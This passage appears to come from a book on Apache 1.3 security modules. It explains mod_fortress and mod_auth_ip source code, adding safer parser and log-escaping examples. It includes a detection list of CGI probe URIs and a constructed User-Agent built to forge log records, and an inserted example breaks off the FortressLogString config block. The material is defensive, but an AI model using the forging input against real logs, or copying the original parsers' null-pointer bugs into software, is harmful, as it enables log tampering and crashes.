            dst[i] = '\0'; }
    }
}
/*
 * parse request description from httpd.conf
 */
void
parse_desc(char *uri, char *dst)
{
    char *p;
    int i;
    p = (char *)strchr(uri, ';');
    if(p == NULL) {
        dst[0] = '\0';
    }
    ap_snprintf(dst, BUFFER, "%s", p + 1);
    for(i = 0; i < strlen(dst); i++) {
        if(dst[i] == '[') {
            dst[i] = '\0'; }
    }
}

/*
 * parse the transparent/non-transparent http code if found
 */
void
parse_code(char *code, char *dst)
{
    char *start, *end;
    start = (char *)strchr(code, '[');
    if(start == NULL) {
        dst[0] = '\0';
    }
    end = (char *)strchr(code, ']');
    if(end == NULL) {
        dst[0] = '\0';
    }
    if(start > end) {
        dst[0] = '\0';
    }
    ap_snprintf(dst, 10, "%s", start + 1);
    dst[strlen(dst)-1] = '\0';
}
void
myitoa(int n, char s[])
{
    int i, ii, jj, c, sign;
    if ((sign = n) < 0)
        n = -n;
    i = 0;
    do {
        s[i++] = n % 10 + '0';
    } while ((n /= 10) > 0);
    if(sign < 0)
        s[i++] = '-';
    s[i] = '\0';
    for(ii = 0, jj = strlen(s)-1; ii < jj; ii++, jj--) {
        c = s[ii];
        s[ii] = s[jj];
        s[jj] = c;
    }
}

/*
 * squeeze() from K&R
 */
void
squeeze(char s[], int c)
{
    int i, j;
    for(i = j = 0; s[i] != '\0'; i++)
        if(s[i] != c)
            s[j++] = s[i];
    s[j] = '\0';
}

void
replace(char *str, char *in, int pos)
{
    char temp[BUFFER];
    char mystring[BUFFER];
    ap_snprintf(mystring, BUFFER, "%s", str);
    mystring[pos] = '\0';
    ap_snprintf(temp, BUFFER, "%s%s%s", mystring, in, &str[pos + 3]);
    ap_snprintf(str, BUFFER, "%s", temp);
}

/*
 * the non-transparent proxy/fim: fortress in the middle
 */
static int fortress_fim(request_rec *r)
{
    FortressOps *cfg = (FortressOps *)ap_get_module_config(r->
                       per_dir_config, &fortress_module);
    struct ParseOps pops;
    char **scrs = (char **)cfg->scripts->elts;
    int i;
    for(i = 0; i < cfg->scripts->nelts; i++) {
        parse_uri(scrs[i], pops.ParsedURI);
        parse_code(scrs[i], pops.ParsedCode);
        squeeze(pops.ParsedURI, ' ');
        if(!strcmp(pops.ParsedURI, strwdel(r->uri)) || \
           !strcmp(strupper(pops.ParsedURI), r->uri)) {
            if (atoi(pops.ParsedCode) == 0 || pops.ParsedCode == NULL) {
                return OK;
            } else {
                return atoi(pops.ParsedCode);
            }
        }
    }
    return OK;
}
const char *fortress_config_cmd_tag(cmd_parms *parms, void *mconfig,
                                    char *arg)
{
    char line[BUFFER];
    FortressOps *cfg = (FortressOps *)mconfig;
    while(!ap_cfg_getline(line, sizeof(line), parms->config_file)) {
        if(strcasecmp(line, "</FortressSignatures>") == 0) {
            break;
        }
        /*
         * ignore comments and empty lines
         */
        if(!*line || *line == '#') {
            continue;
        }
        *(char **)ap_push_array(cfg->scripts) = ap_pstrdup(parms->pool, line);
    }
    return NULL;
}

static const char *fortress_config_cmd_end(cmd_parms *parms,
                                           void *mconfig, char *arg)
{
    return ap_pstrcat(parms->pool, parms->cmd->name,
                      " not matched with <",
                      parms->cmd->name + 2, " section", NULL);
}

static command_rec fortress_cmds[] = {
    {"<FortressSignatures>", fortress_config_cmd_tag, NULL, OR_ALL,
     NO_ARGS, "list of signatures"},
    {"</FortressSignatures>", fortress_config_cmd_end, NULL, OR_ALL,
     NO_ARGS, "ending tag"},
    {"FortressLog", fortress_config_logfile, NULL, RSRC_CONF, TAKE1,
     "name of logfile"},
    {"FortressLogString", fortress_config_log_string, NULL, RSRC_CONF,
     TAKE1, "format string"},
    {NULL},
};


/*
 * open log file
 */
static void open_log(server_rec *s, pool *p)
{
    LogOps *cls = (LogOps *)ap_get_module_config(s->module_config,
                  &fortress_module);
    struct openflags of;
    char *fname = ap_server_root_relative(p, cls->logname);
    of.flags = O_WRONLY|O_APPEND|O_CREAT;
    of.mode = S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH;

    if(fname != '\0') {
        cls->log_fd = ap_popenf(p, fname, of.flags, of.mode);
    }

    if(cls->log_fd < 0) {
        ap_log_error(APLOG_MARK, APLOG_ERR, s, "mod_fortress: Can't open %s",
                     fname);
        exit(1); }
}

/*
 * initialize the module
 */
static void init_fortress(server_rec *s, pool *p)
{
#ifdef SHOW_VERSION_COMPONENT
    ap_add_version_component(MODULE_RELEASE);
#endif
    for(;s;s = s->next)
        open_log(s, p);
}

/*
 * log requests to logfile
 */
static int fortress_log(request_rec *orig)
{
    LogOps *cls = (LogOps *)ap_get_module_config(orig->server->
                  module_config, &fortress_module);
    FortressOps *cfg = (FortressOps *)ap_get_module_config(orig->
                       per_dir_config, &fortress_module);
    struct ParseOps pops;
    struct tm *tm = localtime(&orig->request_time);
    char **scr = (char **)cfg->scripts->elts;
    request_rec *r;
    char fs[BUFFER];
    char buf[BUFFER], temp[BUFFER], temp2[BUFFER];
    int x;
    int i, j;
    for(r = orig; r->next; r = r->next)
        continue;
    for(i = 0; i < cfg->scripts->nelts; i++) {
        parse_uri(scr[i], pops.ParsedURI);
        parse_desc(scr[i], pops.ParsedDesc);
        squeeze(pops.ParsedURI, ' ');
        if(!strcmp(pops.ParsedURI, strwdel(orig->uri)) \
           || !strcmp(strupper(pops.ParsedURI), orig->uri)) {
            /*
             * parse the format string
             */
            ap_snprintf(fs, BUFFER, "%s", cls->format_string);
            for(j = 0; j < strlen(fs); j++) {
                if(fs[j] == '%' && fs[j+1] == 'R') { /* request based */
                    if(fs[j+2] == 'u') {
                        replace(fs, orig->uri, j);
                    }
                    if(fs[j+2] == 'r') {
                        replace(fs, orig->the_request, j);
                    }
                    if(fs[j+2] == 'd') {
                        replace(fs, pops.ParsedDesc, j);
                    }
                    if(fs[j+2] == 'm') {
                        replace(fs, (char *)orig->method, j);
                    }
                    if(fs[j+2] == 'p') {
                        replace(fs, orig->protocol, j);
                    }
                    if(fs[j+2] == 'q') {
                        replace(fs, (char *)get_args(orig), j);
                    }
                } /* !request based */

                if(fs[j] == '%' && fs[j+1] == 'C') { /* connection based */
                    if(fs[j+2] == 'i') {
                        replace(fs, orig->connection->remote_ip, j);
                    }
                    if(fs[j+2] == 'h') {
                        replace(fs, (char *)ap_get_remote_host(orig->
                                connection, orig->per_dir_config, REMOTE_NAME), j); }
                    if(fs[j+2] == 'l') {
                        replace(fs, orig->connection->local_ip, j);
                    }
                } /* !connection based */

                if(fs[j] == '%' && fs[j+1] == 'S') { /* server based */
                    if(fs[j+2] == 'n') {
                        replace(fs, (char *)ap_get_server_name(orig), j);
                    }
                    if(fs[j+2] == 'h') {
                        replace(fs, orig->server->server_hostname, j);
                    }
                    if(fs[j+2] == 'p') {
                        replace(fs, (char *)ap_psprintf(r->pool,
                                "%u", r->server->port), j); }
                    if(fs[j+2] == 'v') {
                        replace(fs, orig->server->addrs->virthost, j);
                    }
                    if(fs[j+2] == 'a') {
                        replace(fs, orig->server->server_admin, j);
                    }
                } /* !server based */

                if(fs[j] == '%' && fs[j+1] == 'T') { /* time based */
                    if(fs[j+2] == 's') {
                        replace(fs, (char *)ap_psprintf(r->pool, "%02d", tm->tm_sec), j);
                    }
                    if(fs[j+2] == 'm') {
                        replace(fs, (char *)ap_psprintf(r->pool, "%02d", tm->tm_min), j);
                    }
                    if(fs[j+2] == 'h') {
                        replace(fs, (char *)ap_psprintf(r->pool, "%02d", tm->tm_hour), j);
                    }
                    if(fs[j+2] == 'd') {
                        replace(fs, (char *)ap_psprintf(r->pool, "%02d", tm->tm_mday), j);
                    }
                    if(fs[j+2] == 'M') {
                        replace(fs, (char *)ap_psprintf(r->pool, "%02d", tm->tm_mon+1), j);
                    }
                    if(fs[j+2] == 'y') {
                        replace(fs, (char *)ap_psprintf(r->pool, "%2d",
                                tm->tm_year+1900), j);
                    }
                } /* !time based */

                if(fs[j] == '%' && fs[j+1] == 'H') {
                    ap_snprintf(temp, BUFFER, "%s", &fs[j+3]);
                    for(i = 0; i < strlen(fs); i++) {
                        if(temp[i] == ']') {
                            temp[i] = '\0';
                            x = i;
                        }
                    }
                    ap_snprintf(temp2, BUFFER, "%s", fs);
                    temp2[j] = '\0';
                    ap_snprintf(buf, BUFFER, "%s%s%s", temp2, (char *)
                                get_hin(orig, temp),
                                &temp2[j + 4 + strlen(temp)]);
                    ap_snprintf(fs, BUFFER, "%s", buf);
                }
            }
            for(i = 0; i < strlen(fs); i++) {
                if(fs[i] == '&') {
                    fs[i] = '\n';
                } }
            strcat(fs, "\n");
            write(cls->log_fd, fs, strlen(fs));
            return OK;
        }
    }
    return OK;
}


module MODULE_VAR_EXPORT fortress_module = {
    STANDARD_MODULE_STUFF,
    init_fortress,                 // module initializer
    fortress_create_dir_config,    // create per-dir config structures
    NULL,
    fortress_create_srv_config,    // create per-server config structures
    NULL,
    fortress_cmds,                 // table of config file commands
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
#ifdef RUN_LOGGER
    fortress_log,                  // log a transaction
#else
    NULL,
#endif /* !RUN_LOGGER */
#ifdef RUN_FORTRESS_IN_THE_MIDDLE
    fortress_fim,                  // header parser
#else
    NULL,
#endif /* !RUN_FORTRESS_IN_THE_MIDDLE */
    NULL,
    NULL,
    NULL
};

// a newline at the end!


How mod_fortress Plugs into Apache

Again, places where your module might plug in include

• Initialization
• Configuration
• Command handlers
• Translate handlers
• User ID, auth, and access check
• Type checker
• Content handling
• Logging
• Other functions

mod_fortress begins by establishing some configuration information, including
the necessary Apache libraries, and naming itself:


/** configuration defines **/

// enable non-transparent proxy
#define RUN_FORTRESS_IN_THE_MIDDLE

// enable logging ?
#define RUN_LOGGER

// show text banner in Server: header ?
// #define SHOW_VERSION_COMPONENT

/** !configuration defines **/

#define BUFFER 1000
#define MODULE_RELEASE "mod_fortress/0.4"

#include "httpd.h"
#include "http_core.h"
#include "http_log.h"
#include "http_main.h"
#include "http_request.h"
#include "http_protocol.h"
#include "http_config.h"

module MODULE_VAR_EXPORT fortress_module;


Next, it sets up flags and data structures:

/* the structs that "which are NOT for sissies" */
struct ParseOps {
    char ParsedURI[BUFFER];
    char ParsedCode[BUFFER];
    char ParsedDesc[BUFFER];
};

struct openflags {
    int flags;
    mode_t mode;
};

typedef struct {
    array_header *scripts;
} FortressOps;

typedef struct {
    int log_fd;             /* file descriptor */
    char *logname;          /* log filename */
    char *format_string;
} LogOps;


After handling some more configuration issues, resource allocation pools, and such,
it addresses query arguments, if any:

/*
 * get query args if any
 */
static const char *get_args(request_rec *r)
{
    return (r->args != NULL) ? ap_pstrcat(r->pool,
                                          "?", r->args, NULL) : " ";
}

static const char *get_hin(request_rec *r, char *hin)
{
    if(ap_table_get(r->headers_in, hin))
        return ap_table_get(r->headers_in, hin);
    return " ";
}


After defining its character-handling helpers, it parses the request URI entries from
httpd.conf:

/*
 * parse request uri from httpd.conf
 */
void
parse_uri(char *uri, char *dst)
{
    int i;
    ap_snprintf(dst, 100, "%s", uri);
    for(i = 0; i < strlen(dst); i++) {
        if(dst[i] == ';') {
            dst[i] = '\0'; }
    }
}

/*
 * parse request description from httpd.conf
 */
void
parse_desc(char *uri, char *dst)
{
    char *p;
    int i;
    p = (char *)strchr(uri, ';');
    if (p == NULL) {
        dst[0] = '\0';
    }
    ap_snprintf(dst, BUFFER, "%s", p + 1);
    for(i = 0; i < strlen(dst); i++) {
        if(dst[i] == '[') {
            dst[i] = '\0'; }
    }
}


It then establishes a command table:

static command_rec fortress_cmds[] = {
    {"<FortressSignatures>", fortress_config_cmd_tag, NULL, OR_ALL,
     NO_ARGS, "list of signatures"},
    {"</FortressSignatures>", fortress_config_cmd_end, NULL, OR_ALL,
     NO_ARGS, "ending tag"},
    {"FortressLog", fortress_config_logfile, NULL, RSRC_CONF, TAKE1,
     "name of logfile"},
    {"FortressLogString", fortress_config_log_string, NULL, RSRC_CONF,
     TAKE1, "format string"},
    {NULL},
};
This is for httpd.conf, where you use mod_fortress directives, such as
<FortressSignatures> (which defines attack signatures) and FortressLog (which
specifies the logging parameters). The signature block looks like this, for humans:

<IfModule mod_fortress.c>

# the signatures

<FortressSignatures>
/cgi-bin/; /cgi-bin/ Directory Listing attempt [0]
/cgi-bin/webdist.cgi; Webdist CGI Attempt [404]
/cgi-bin/handler; Handler CGI Attempt [404]
/cgi-bin/wrap; Wrap CGI Attempt [404]
/cgi-bin/pfdisplay.cgi; Pfdisplay CGI Attempt [404]
/cgi-bin/MachineInfo; MachineInfo CGI Attempt [404]
/cgi-bin/flexform.cgi; Flexform CGI Attempt [404]
/cgi-bin/flexform; Flexform CGI Attempt [404]
/cgi-win/; /cgi-win/ Directory Listing Attempt [404]
/cgi-bin/day5datacopier.cgi; Day5datacopier CGI Attempt [404]
/cgi-bin/webutils.pl; Webutils CGI Attempt [404]
/cgi-bin/tpgnrock; Tpgnrock CGI Attempt [404]
/cgi-bin/webwho.pl; Webwho.pl CGI Attempt [404]
</FortressSignatures>
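The three parse_* functions in the source above split each signature line into its URI, its description, and the bracketed response code, but neither parse_desc() nor parse_code() returns after finding a line without a ';' or a '[', so they go on to read from a null or misplaced pointer. As an added example (not mod_fortress’s code), here is a bounds-checked parser for the same "<uri>; <description> [<code>]" line format, together with a matcher that applies the same normalisation as strwdel() and strupper(): backslashes become slashes and the comparison is case-insensitive on both sides, a generalisation of the original’s one-sided upper-casing. The sample lines are constructed in the format of the block above; parse_signature(), check_request() and load_samples() are this example’s own names.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIG_LEN 256

struct signature {
    char uri[SIG_LEN];
    char desc[SIG_LEN];
    int  code;           /* 0 = log only, otherwise the HTTP status to return */
};

/* Copy [src, end) into dst without surrounding blanks; 0 if it will not fit. */
static int copy_trimmed(char *dst, size_t cap, const char *src, const char *end) {
    while (src < end && isspace((unsigned char)*src)) src++;
    while (end > src && isspace((unsigned char)end[-1])) end--;
    if ((size_t)(end - src) >= cap) return 0;
    memcpy(dst, src, (size_t)(end - src));
    dst[end - src] = '\0';
    return 1;
}

/* Parse one signature line. Returns 1 on success, 0 on a malformed line
 * (no ';', empty URI, unterminated '[', non-numeric or implausible code). */
int parse_signature(const char *line, struct signature *sig) {
    const char *semi = strchr(line, ';');
    if (!semi || semi == line) return 0;
    const char *lb = strchr(semi + 1, '[');
    const char *rb = lb ? strchr(lb, ']') : NULL;
    if (lb && !rb) return 0;
    if (!copy_trimmed(sig->uri, sizeof sig->uri, line, semi)) return 0;
    if (!copy_trimmed(sig->desc, sizeof sig->desc, semi + 1,
                      lb ? lb : line + strlen(line))) return 0;
    sig->code = 0;
    if (lb) {
        char *endp;
        long v = strtol(lb + 1, &endp, 10);
        if (endp != rb || v < 0 || v > 599) return 0;
        sig->code = (int)v;
    }
    return 1;
}

/* Exact match after folding case and mapping '\\' to '/' in the request. */
static int uri_matches(const char *sig_uri, const char *req_uri) {
    for (; *sig_uri && *req_uri; sig_uri++, req_uri++) {
        int a = tolower((unsigned char)*sig_uri);
        int b = tolower((unsigned char)*req_uri);
        if (b == '\\') b = '/';
        if (a != b) return 0;
    }
    return *sig_uri == '\0' && *req_uri == '\0';
}

/* Status code to send for req_uri (0 = no match, or a log-only entry);
 * *matched receives the matching signature or NULL. */
int check_request(const struct signature *sigs, int n, const char *req_uri,
                  const struct signature **matched) {
    *matched = NULL;
    for (int i = 0; i < n; i++) {
        if (uri_matches(sigs[i].uri, req_uri)) {
            *matched = &sigs[i];
            return sigs[i].code;
        }
    }
    return 0;
}

/* Constructed sample lines in the <FortressSignatures> format. */
static const char *sample_lines[] = {
    "/cgi-bin/; /cgi-bin/ Directory Listing attempt [0]",
    "/cgi-bin/webdist.cgi; Webdist CGI Attempt [404]",
    "/cgi-bin/handler; Handler CGI Attempt [404]",
    "# comment line, skipped like the module's reader does",
    "/cgi-bin/broken; missing bracket [404",
};

/* Load the sample table, skipping comments and rejecting malformed lines;
 * returns how many signatures were accepted. */
int load_samples(struct signature *out, int cap) {
    int n = 0;
    for (size_t i = 0; i < sizeof sample_lines / sizeof *sample_lines && n < cap; i++) {
        if (sample_lines[i][0] == '#') continue;
        if (parse_signature(sample_lines[i], &out[n])) n++;
    }
    return n;
}
```

Note that, like the original, the match is exact rather than a prefix match: the "/cgi-bin/" entry matches only a request for "/cgi-bin/" itself, not "/cgi-bin/handler".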


The logging parameter block, which specifies where the log goes and what it should
record, looks like this:

FortressLog logs/fortress_log
FortressLogString "\
Source: %Ci & \
Destination: %Sh & \
Port: %Sp & \
Request Line: %Rr & \
Description: %Rd & \
Method: %Rm & \
Protocol: %Rp & \
Virtual Host: %Sv & \
User-Agent: %H[User-Agent] & \
Query Arguments: %Rq & \
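In fortress_log() the format string is expanded in place, and the pass that turns each '&' into a newline runs after header values such as %H[User-Agent] have been substituted, so an '&' or a raw newline arriving in a client header ends up as extra lines in the log. As an added example (not mod_fortress’s code), here is an expander for the same %R, %C, %S and %H[...] tokens that writes into a separate output buffer and escapes '&' and control bytes in substituted values, so a record can only be split by the format string itself. The req_info struct stands in for request_rec; the sample request, including its hostile User-Agent, is constructed; expand_log_format() and the other names are this example’s own. The %T time tokens are left out to keep the example short.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

struct req_info {                 /* constructed stand-in for request_rec */
    const char *uri, *request_line, *method, *protocol, *query, *desc;
    const char *remote_ip, *local_ip, *server_host;
    int port;
    const char *header_names[4];  /* parallel arrays, NULL-terminated */
    const char *header_values[4];
};

/* Look up an incoming header by name; "-" when absent. */
static const char *header_in(const struct req_info *r, const char *name) {
    for (int i = 0; i < 4 && r->header_names[i]; i++)
        if (strcasecmp(r->header_names[i], name) == 0) return r->header_values[i];
    return "-";
}

/* Append s to out, escaping '&', newlines and other control bytes as \xHH
 * so a client-supplied value cannot start a new log record. 0 = out full. */
static int put_escaped(char *out, size_t cap, size_t *len, const char *s) {
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        int n = (c == '&' || c < 0x20 || c == 0x7f)
                  ? snprintf(out + *len, cap - *len, "\\x%02x", c)
                  : snprintf(out + *len, cap - *len, "%c", c);
        if (n < 0 || (size_t)n >= cap - *len) return 0;
        *len += (size_t)n;
    }
    return 1;
}

/* Expand a FortressLogString-style format for r into out. Returns 1 on
 * success, 0 on overflow or an unterminated %H[. Unknown tokens pass through. */
int expand_log_format(const struct req_info *r, const char *fmt, char *out, size_t cap) {
    size_t len = 0;
    char portbuf[16];
    out[0] = '\0';
    for (const char *p = fmt; *p; ) {
        const char *val = NULL;
        if (*p == '&') {                              /* record separator -> newline */
            if (len + 1 >= cap) return 0;
            out[len++] = '\n'; out[len] = '\0'; p++; continue;
        }
        if (*p == '%' && p[1] == 'H' && p[2] == '[') {  /* %H[Header-Name] */
            const char *rb = strchr(p + 3, ']');
            char name[64];
            if (!rb || rb - (p + 3) >= (long)sizeof name) return 0;
            memcpy(name, p + 3, (size_t)(rb - (p + 3)));
            name[rb - (p + 3)] = '\0';
            if (!put_escaped(out, cap, &len, header_in(r, name))) return 0;
            p = rb + 1; continue;
        }
        if (*p == '%' && p[1] && p[2]) {
            switch (p[1]) {
            case 'R':                                 /* request based */
                val = p[2] == 'u' ? r->uri : p[2] == 'r' ? r->request_line :
                      p[2] == 'm' ? r->method : p[2] == 'p' ? r->protocol :
                      p[2] == 'q' ? r->query : p[2] == 'd' ? r->desc : NULL;
                break;
            case 'C':                                 /* connection based */
                val = p[2] == 'i' ? r->remote_ip : p[2] == 'l' ? r->local_ip : NULL;
                break;
            case 'S':                                 /* server based */
                if (p[2] == 'h') val = r->server_host;
                else if (p[2] == 'p') { snprintf(portbuf, sizeof portbuf, "%d", r->port); val = portbuf; }
                break;
            default:
                break;
            }
        }
        if (val) {
            if (!put_escaped(out, cap, &len, val)) return 0;
            p += 3; continue;
        }
        if (len + 1 >= cap) return 0;                 /* plain literal character */
        out[len++] = *p++; out[len] = '\0';
    }
    return 1;
}

/* Constructed request whose User-Agent tries to forge a second record with
 * an '&' and a raw newline. */
const struct req_info sample_req = {
    "/cgi-bin/webdist.cgi", "GET /cgi-bin/webdist.cgi HTTP/1.0", "GET", "HTTP/1.0",
    "?arg=1", "Webdist CGI Attempt",
    "203.0.113.7", "192.0.2.10", "www.example.com", 80,
    {"Host", "User-Agent", NULL, NULL},
    {"www.example.com", "Mozilla/4.0 & Source: 198.51.100.1\nforged", NULL, NULL},
};
```

With the sample request, "User-Agent: %H[User-Agent]" yields one line in which the '&' and the newline appear as \x26 and \x0a, whereas the in-place scheme would have produced a forged "Source:" record on a line of its own.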
It then handles the log file:

/*
 * open log file
 */
static void open_log(server_rec *s, pool *p)
{
    LogOps *cls = (LogOps *)ap_get_module_config(s->module_config,
                  &fortress_module);
    struct openflags of;
    char *fname = ap_server_root_relative(p, cls->logname);
    of.flags = O_WRONLY|O_APPEND|O_CREAT;
    of.mode = S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH;

    if(fname != '\0') {
        cls->log_fd = ap_popenf(p, fname, of.flags, of.mode);
    }

    if(cls->log_fd < 0) {
        ap_log_error(APLOG_MARK, APLOG_ERR, s, "mod_fortress: Can't open %s",
                     fname);
        exit(1); }
}

It then initializes itself:

/*
 * initialize the module
 */
static void init_fortress(server_rec *s, pool *p)
{
#ifdef SHOW_VERSION_COMPONENT
    ap_add_version_component(MODULE_RELEASE);
#endif
    for(;s;s = s->next)
        open_log(s, p);
}


And finally, it does its work (logging) and performs some cleanup. mod_fortress is,
therefore, an enhanced logging and filtering module. It intervenes in several important
places:

• Configuration
• Commands
• Logging

Along that road, it uses a variety of functions, including a few of the usual suspects
common to Apache’s API:

• ap_cfg_getline()—Gets a line from the configuration file
• ap_get_module_config()—Gets the request_rec’s per-directory configuration
  vector
• ap_get_remote_host()—Gets the remote host
• ap_get_server_name()—Gets the server name
• ap_log_error()—Log handling
• ap_make_array()—Array allocation
• ap_palloc()—Resource pool handling
• ap_popenf()—File opening
• ap_pstrcat()—String handling
• ap_server_root_relative()—Appends the filename or directory to
  ServerRoot’s path
mod_auth_ip: Another Example

Tullio Andreatta released a module in 2000 that authenticates via a client’s incoming
IP address. Andreatta’s module—which performs this task well—is not something
you should solely rely on to authenticate users and machines requesting access to
sensitive areas of your server. Spoofing by address is still possible. Also, Apache
provides allow/deny functionality based on IP (and a host of other values). However,
Andreatta’s module provides an extra layer of protection, which can never hurt.

After his initial includes (httpd.h, http_config.h, http_core.h, http_log.h, and
http_protocol.h), Andreatta first establishes a structure for IP addresses, and flags
for their state:

typedef struct auth_ip_struct {
    char *user;                  /* Username assigned on match */
    struct in_addr network;      /* Network */
    struct in_addr netmask;      /* Netmask */
    int check_method;
#define IP_MATCH    0
#define IP_NOMATCH  1
#define IP_RANGE    2
#define IP_NOTRANGE 3
He next sets up the configuration (and establishes a pool):

static void *create_auth_ip_dir_config(pool *p, char *d)
{
    auth_ip_config_rec *sec =
        (auth_ip_config_rec *) ap_pcalloc(p, sizeof(auth_ip_config_rec));
    sec->auth_ip = ap_make_array(p, 4, sizeof(auth_ip_rec));
    return sec;
}


He then establishes some rules for network/netmask pairs. These rules are as follows:

• 212.38.32.31 = Single IP (212.38.32.31/32)
• 212.38.32.0/22 = Network (22 bits netmask)
• 212.38.32.0/255.255.254.0 = Network (23 bits netmask)
• 212.38.32 = Network (24 bits netmask)
• 212.38. = Network (16 bits netmask)
• 212.38.32.4/.252 = Network (30 bits netmask)
• 212.38.32.8-212.38.32.11 = IP range
• !212.38.32.31 = Reverse IP/Network/Range

He next runs a string comparison function:


static char *convert_string_to_network(char *str, auth_ip_rec *net)
{
    int a = -1, b = -1, c = -1, d = -1;
    if (*str == '!')
    {
        net->check_method = IP_NOMATCH;
        str++;
    }
    else
    {
        net->check_method = IP_MATCH;
    }
    while (*str == ' ' || *str == '\t' || *str == '\n')
    {
        str++;
    }
    while (*str >= '0' && *str <= '9')
    {
        if (a <= 0) a = *str - '0';
        else a = 10 * a + (*str - '0');
        str++;
    }
    if (*str == '.')
    {
        str++;
        while (*str >= '0' && *str <= '9')
        {
            if (b <= 0) b = *str - '0';
            else b = 10 * b + (*str - '0');
            str++;
        }
    }
    if (*str == '.')
    {
        str++;
        while (*str >= '0' && *str <= '9')
        {
            if (c <= 0) c = *str - '0';
            else c = 10 * c + (*str - '0');
            str++;
        }
    }
    if (*str == '.')
    {
        str++;
        d = 0;
        while (*str >= '0' && *str <= '9')
        {
            if (d <= 0) d = *str - '0';
            else d = 10 * d + (*str - '0');
            str++;
        }
    }
    while (d > 255)
    {
        d >>= 8;
    }
    while (c > 255)
    {
        d = c & 255;
        c >>= 8;
    }
    while (b > 255)
    {
        d = c;
        c = b & 255;
        b >>= 8;
    }
    while (a > 255)
    {
        d = c;
        c = b;
        b = a & 255;
        a >>= 8;
    }
    if (d < 0) if (c < 0) if (b < 0) if (a < 0)
        net->netmask.s_addr = htonl(0x00000000);
    else
        net->netmask.s_addr = htonl(0xFF000000);
    else
        net->netmask.s_addr = htonl(0xFFFF0000);
    else
        net->netmask.s_addr = htonl(0xFFFFFF00);
    else
        net->netmask.s_addr = htonl(0xFFFFFFFF);

    if (a < 0) a = 0;
    if (b < 0) b = 0;
    if (c < 0) c = 0;
    if (d < 0) d = 0;
    net->network.s_addr = htonl((a << 24) | (b << 16) |
                                (c << 8) | (d));

He then checks for IP ranges:

    if (*str == '-')
    {
        str++;
        net->check_method = net->check_method == IP_MATCH
                            ? IP_RANGE : IP_NOTRANGE;
        a = b = c = d = 0;
        while (*str == ' ' || *str == '\t' || *str == '\n')
        {
            str++;
        }
        while (*str >= '0' && *str <= '9')
        {
            a = 10 * a + (*str - '0');
            str++;
        }
        if (*str == '.')
        {
            str++;
            while (*str >= '0' && *str <= '9')
            {
                b = 10 * b + (*str - '0');
                str++;
            }
        }
        if (*str == '.')
        {
            str++;
            while (*str >= '0' && *str <= '9')
            {
                c = 10 * c + (*str - '0');
                str++;
            }
        }
        if (*str == '.')
        {
            str++;
            d = 0;
            while (*str >= '0' && *str <= '9')
            {
                d = 10 * d + (*str - '0');
                str++;
            }
        }
        while (d > 255)
        {
            d >>= 8;
        }
        while (c > 255)
        {
            d = c & 255;
            c >>= 8;
        }
        while (b > 255)
        {
            d = c;
            c = b & 255;
            b >>= 8;
        }
        while (a > 255)
        {
            d = c;
            c = b;
            b = a & 255;
            a >>= 8;
        }
        net->netmask.s_addr = htonl((a << 24) |
                                    (b << 16) | (c << 8) | (d));
    }
    return *str ? str : NULL;
}


His command structure, however, is spartan, as the module performs a limited task 
or tasks: 

static const command_rec auth_ip_cmds[] =
{
    {"AuthenticateIP", add_authenticated_ip, NULL, OR_AUTHCFG, ITERATE2,
     "username followed by one or more networks (IP, IP/bits or IP/.mask)"},
    {NULL}
};


Equally, his request handler (the function that receives the request_rec) is lean: 

static int authenticate_ip_user(request_rec *r)
{
    auth_ip_config_rec *sec =
        (auth_ip_config_rec *) ap_get_module_config(r->per_dir_config,
                                                    &auth_ip_module);
    const char *sent_pw;
    auth_ip_rec *ip = (auth_ip_rec *) sec->auth_ip->elts;
    int i;

    if (!sec->auth_ip->nelts) return DECLINED;   /* we're not configured */
    for (i = 0; i < sec->auth_ip->nelts; i++)
    {
        /* compare the client's source address with each configured network */
        if (ip_check(&(r->connection->remote_addr.sin_addr), &ip[i]))
        {
            r->connection->user = ap_pstrdup(r->connection->pool, ip[i].user);
            return OK;          /* IP is my authentication */
        }
    }
    return DECLINED;            /* switch to default authentication */
}


And finally, he wraps up with the export: 

module MODULE_VAR_EXPORT auth_ip_module =
{
    STANDARD_MODULE_STUFF,
    NULL,                       /* initializer */
    create_auth_ip_dir_config,  /* dir config creater */
    NULL,                       /* dir merger --- default is to override */
    NULL,                       /* server config */
    NULL,                       /* merge server config */
    auth_ip_cmds,               /* command table */
    NULL,                       /* handlers */
    NULL,                       /* filename translation */
    authenticate_ip_user,       /* check_user_id */
    NULL,                       /* check auth */
    NULL,                       /* check access */
    NULL,                       /* type_checker */
    NULL,                       /* fixups */
    NULL,                       /* logger */
    NULL,                       /* header parser */
    NULL,                       /* child_init */
    NULL,                       /* child_exit */
    NULL                        /* post read-request */
};


NOTE 

Andreatta’s mod_auth_ip takes a single directive (AuthenticateIP). To see the full 
documentation, how it works, and what it does, check its home page located at 
http://www.troppoavanti.it//modules/mod_auth_ip/mod_auth_ip.html 
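The conversion above packs whatever octets the administrator typed and lets the number of octets supplied decide the netmask; authenticate_ip_user() then asks ip_check() (not shown on the page) whether the client's source address falls inside the result. What follows is an added example, not Andreatta's code: a stand-alone C parser and matcher for the same kind of specification that also covers the IP/bits and IP/mask forms the directive's help string names. The names ip_net, parse_network, ip_matches, spec_matches and ip4 are this example's own, and unlike the original it rejects over-long octets and trailing text instead of shifting them into the next octet.

```c
/* Added example, not mod_auth_ip's own code: parse an AuthenticateIP-style
 * network spec and match addresses against it. Supports IP, IP/bits and
 * IP/mask, the module's '!' negation, and its implied mask for partial
 * dotted quads ("10.1" means 10.1.0.0 with mask 255.255.0.0). ip_net,
 * parse_network, ip_matches, spec_matches and ip4 are names chosen here;
 * addresses are host-order uint32_t values, so no socket headers are needed. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>

typedef struct {
    uint32_t network;   /* already masked, host byte order */
    uint32_t netmask;   /* host byte order */
    int      negate;    /* 1 when the spec began with '!' */
} ip_net;

/* Read up to four dot-separated octets, left-packed into *value. Returns the
 * octet count (0..4) or -1 if an octet exceeds 255 or a dot lacks a digit. */
static int parse_octets(const char *s, const char **end, uint32_t *value)
{
    int n = 0;
    *value = 0;
    while (n < 4 && isdigit((unsigned char)*s)) {
        unsigned v = 0;
        while (isdigit((unsigned char)*s)) {
            v = v * 10 + (unsigned)(*s++ - '0');
            if (v > 255) return -1;             /* refuse over-long octets */
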